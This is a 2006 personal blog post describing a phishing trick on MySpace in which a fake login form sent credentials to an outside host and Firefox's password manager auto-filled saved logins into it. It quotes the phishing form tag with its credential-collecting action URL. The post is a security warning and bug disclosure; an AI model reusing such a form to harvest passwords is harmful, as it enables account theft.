${log.root}/lowem.log
Inflation, Investing and Everything


All | Musings | Tech | Java | Biz | Energy | Env

AddThis Feed Button
20061127 Monday November 27, 2006

Cross-Site Forms + Password Manager = Security Failure

forums.mozillazine.org, forums.mozillazine.org -> bugzilla.mozilla.org :

I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manger!

The underlying method was so obvious that it should have raised multiple warnings. There were none at all.

It was in a MySpace profile that included this tag:

<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post">

What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.

Not only did FireFox fail to raise a warning, it auto-filled my www.myspace.com username and password into this form!! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website ...

- As a browser security breach, this is too easy. Have to be very careful before submitting forms with auto-filled passwords. Seems to be a basic design issue that affects both IE and Firefox. Convenience vs security.

Kind of ignored this from a couple of weeks back until I went over to Mozillazine and read how the bug works. Really too easy. All you need is a website that allows people to edit HTML code. And for you to have a saved password on that site.

2 weeks now, and still awaiting a 2.0.x fix for Firefox. At least we know that the Firefox folks are working on it.

Update - to check if your browser is vulnerable to this exploit, you can try this demo page by Heise Security. From comment #66 in the bugzilla page.

(2006-11-27 16:44:53 SGT) [Tech] Permalink

Comments:

Post a Comment:

Comments are closed for this entry.




Most popular blog postings on lowem.log :

1. 2010 Nissan Leaf electric car specifications : 107hp, 24KWh lithium-ion batteries, 100-mile range
2. 2010 Honda CR-Z hybrid, 2010 Honda Fit/Jazz hybrid models confirmed
3. 2010 Honda Civic Hybrid preliminary specifications released
4. Singapore SIBOR rate falls to 0.69% in Jan 2009, lowest since Apr 2004
5. How to insert currency exchange rates into Google Spreadsheets
6. Singapore : Nuclear power not ruled out
7. Live spot gold price quotes chart on COMEX
8. 2010 Toyota Prius specifications released : 50 mpg, 1.8L, 134hp, Ni-MH, solar roof option

Featured articles on lowem.log :

1. 2010 Honda Civic Hybrid preliminary specifications released
2. 2010 Honda CR-Z hybrid, 2010 Honda Fit/Jazz hybrid models confirmed
3. 2010 Toyota Prius specifications released : 50 mpg, 1.8L, 134hp, Ni-MH, solar roof option
4. Honda, GS Yuasa JV to make lithium-ion batteries for 2010/2011 Honda Civic Hybrid
5. New efficient nanotech materials may boost enhanced geothermal power systems
6. NYMEX crude oil recovers from $32.40 low after 2.2 mbpd OPEC production cut announced
7. Singapore property market recovery seen as private home sales surge 52% in Jul 2009
8. Singapore SIBOR rate falls to 0.69% in Jan 2009, lowest since Apr 2004





search
sponsored links





bookmarks

about
my profile
contact me

blogroll
biow/ken/wenn
reviewem
sgenergycrisis

sites
photo gallery
wiki

quotes
live oil prices
live gold prices

charts
live forex rates
live oil chart
live gold chart
live silver chart

historical
crude oil chart
gold chart
silver chart


navigation
decals

Featured blogger at The Energy Collective
Click for Singapore, Singapore Forecast





rss feed for lowem.log

Get Firefox!

powered by
hosted by